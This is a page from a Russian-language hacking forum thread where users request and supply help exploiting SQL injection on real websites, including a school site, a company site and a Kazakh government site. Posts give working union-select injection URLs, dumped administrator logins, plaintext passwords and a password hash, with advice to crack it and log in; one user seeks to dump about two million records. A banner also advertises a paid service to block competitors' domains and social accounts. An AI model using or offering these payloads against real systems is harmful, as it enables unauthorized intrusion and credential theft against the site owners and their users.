УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 1962 из 2438

1962

Опции темы

Поиск в этой теме

Опции просмотра

#19611

11.02.2012, 16:12

pirat0

Guest

Сообщений: n/a

Провел на форуме:
23576

Репутация: -1

Цитата:

Сообщение от ivan151

ivan151 said:
вот с разных полей вообще получается Admin-логин
pusti-пароль http://1liceum.ru/shownew.php?setid=-1+union+SELECT+1,login,3,4,password+from+lsh_infou sers

там походу два акка пользователей, в этой таблице, и ни один из них не авторизуется на сайте, поэтому я попробывал запрос http://1liceum.ru/shownew.php?setid=-1+union+SELECT+1,group_concat(table_name,0x3a,colu mn_name),3,4,5+from+information_schema.columns+whe re+column_name+like(0x257061737325)--+

и там еще есть таблички с колонкой пассворд попробуй перебрать их

например вот эту mdl_userassword

#19612

11.02.2012, 16:30

anonym_di

Guest

Сообщений: n/a

Провел на форуме:
11684

Репутация: 0

Ребята помогите раскрутить эту скулю

http://www.mk.gov.kz/?lang=kaz&id_open_rubric=361&page=7

#19613

11.02.2012, 17:05

anonym_di

Guest

Сообщений: n/a

Провел на форуме:
11684

Репутация: 0

Цитата:

Сообщение от ivan151

ivan151 said:
не пускает с такими данными-ошибка авторизации,а может кто нибудь посоветует как быть?линк дал

Данные правильные вот

Код:

Code:
1
Admin 
pusti 
Администратор, 
 
2 
obz 
zbo 
ОБЖ

#19614

11.02.2012, 17:15

Melfis

Guest

Сообщений: n/a

Провел на форуме:
195266

Репутация: 53

Цитата:

Сообщение от anonym_di

anonym_di said:
Ребята помогите раскрутить эту скулю
http://www.mk.gov.kz/?lang=kaz&id_open_rubric=361&page=7

id_open_rubri - макс 5 символов

page - подставляется в лимит, скули нету.

#19615

11.02.2012, 17:28

pirat0

Guest

Сообщений: n/a

Провел на форуме:
23576

Репутация: -1

2IVAN

я же тебе писал не поленись перебери таблицы, если этот сайт для тебя важен,

писал про таблицу mdl_user, вот что из туда выпало:

http://1liceum.ru/shownew.php?setid=-1+union+SELECT+1,group_concat(0x3a,id,username,0x3 a,password),3,4,5+from+u99526_moodle.mdl_user

Код:

Code:
,:2admin:6c83c300238522d49d616550f45f9394,:3uraev:622694bd4f

расшифруй и попробуй авторизоватся

#19616

11.02.2012, 18:37

pirat0

Guest

Сообщений: n/a

Провел на форуме:
23576

Репутация: -1

Цитата:

Сообщение от Ruslan1817

Ruslan1817 said:
http://1liceum.ru/shownew.php?setid=-1+union+SELECT+1,group_concat(login,0x3a,password) %20,3,4,5+from+lsh_infousers+--+
А это чем не по душе?

просто он пишет что авторизоватся на сайте не может с теми даными что получил из таблицы lsh_infousers, я думаю стоит попробывать поискать записи юзверей в других таблицах, и как пример вытянул даные с таблицы mdl_user, где есть запись с login-admin, эту запись остается расшифровать и попробывать залогинится)))

#19617

12.02.2012, 15:37

bodrich

Guest

Сообщений: n/a

Провел на форуме:
5709

Репутация: 0

http://www.interself.ru/info/newsshow.php?num=-273+union+select+1,column_name,3,4,5,6,7,8+from+in formation_schema.columns+where+table_name=0x757365 7273--+

А как здесь вытащить столбцы ?

#19618

12.02.2012, 16:06

pirat0

Guest

Сообщений: n/a

Провел на форуме:
23576

Репутация: -1

Цитата:

Сообщение от bodrich

bodrich said:
http://www.interself.ru/info/newsshow.php?num=-273+union+select+1,column_name,3,4,5,6,7,8+from+in formation_schema.columns+where+table_name=0x757365 7273--+
А как здесь вытащить столбцы ?

вариант №1

http://www.interself.ru/info/newsshow.php?num=-273+union+select+1,group_concat(column_name),3,4,5 ,6,7,8+from+information_schema.columns+where+table _name=0x75736572+limit+0,1--+ (где в хексе user)

вариант №2

http://www.interself.ru/info/newsshow.php?num=-273+union+select+1,group_concat(column_name),3,4,5 ,6,7,8+from+information_schema.columns+where+table _name=0x62346d66715f7573657273+limit+0,1--+ (где в хексе b4mfq_users)

p.s. таблички к которой ты составлял запрос походу нету (users), ну или я ее не нашол))

#19619

12.02.2012, 23:46

Pirotexnik

Guest

Сообщений: n/a

Провел на форуме:
97332

Репутация: 38

Ребят, из-за чего в MySQL скуле може НЕ РАБОТАТЬ where?

Первый раз с таким сталкиваюсь. Любой запрос содержащий where не отрабатывает... Из-за чего может быть? Есть ли аналоги? Нужно сделать дамп примерно 2 000 000 записей. Лимит естественно ложит БД.

p.s. фильтрации нету вроде ни на что. MySQL >=5

#19620

13.02.2012, 01:10

Boolean

Guest

Сообщений: n/a

Провел на форуме:
40748

Репутация: 78

Цитата:

Сообщение от Pirotexnik

Pirotexnik said:
Ребят, из-за чего в MySQL скуле може
НЕ РАБОТАТЬ
where
?
Первый раз с таким сталкиваюсь. Любой запрос содержащий
where
не отрабатывает... Из-за чего может быть? Есть ли аналоги? Нужно сделать дамп примерно 2 000 000 записей. Лимит естественно ложит БД.
p.s. фильтрации нету вроде ни на что. MySQL >=5

фильтр. хотя слабо верится.

Страница 1962 из 2438

1962

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход